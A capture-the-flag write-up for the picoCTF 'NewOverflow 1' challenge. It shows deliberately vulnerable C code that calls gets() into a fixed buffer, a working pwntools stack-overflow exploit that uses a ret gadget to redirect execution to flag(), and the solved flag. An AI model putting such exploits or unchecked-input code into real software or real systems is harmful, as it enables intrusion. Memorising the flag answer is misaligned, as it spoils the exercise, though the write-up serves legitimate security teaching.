-
Notifications
You must be signed in to change notification settings - Fork 1
NewOverflow 1
Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_5_bd04c7682164df72135e036dd527b668 on the shell server. Source.
Now that we're in 64-bit, what used to be 4 bytes, now may be 8 bytes
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFFSIZE 64
#define FLAGSIZE 64
void flag() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("'flag.txt' missing in the current directory!\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFFSIZE];
gets(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Welcome to 64-bit. Give me a string that gets you the flag: ");
vuln();
return 0;
}
You can see in vuln() function. The gets(buf) don't check the number of characters we can input. So, this cause the buffer overflow.
We can use the gets() to overwrite the return address of vuln function and make the flow of programe return to flag.
payload = 'a'*offset + flag_address
There's something wrong on server, so with the pesudo payload , we can't get flag. So, i have tried a ret ROP to make the payload more smoothly.
from pwn import *
s = process('./vuln')
flag = 0x400767
ret = 0x00000000004005de
payload = 0x48*'a'
payload += p64(ret)
payload += p64(flag)
s.sendline(payload)
s.interactive()
picoCTF{th4t_w4snt_t00_d1ff3r3nt_r1ghT?_351346a2}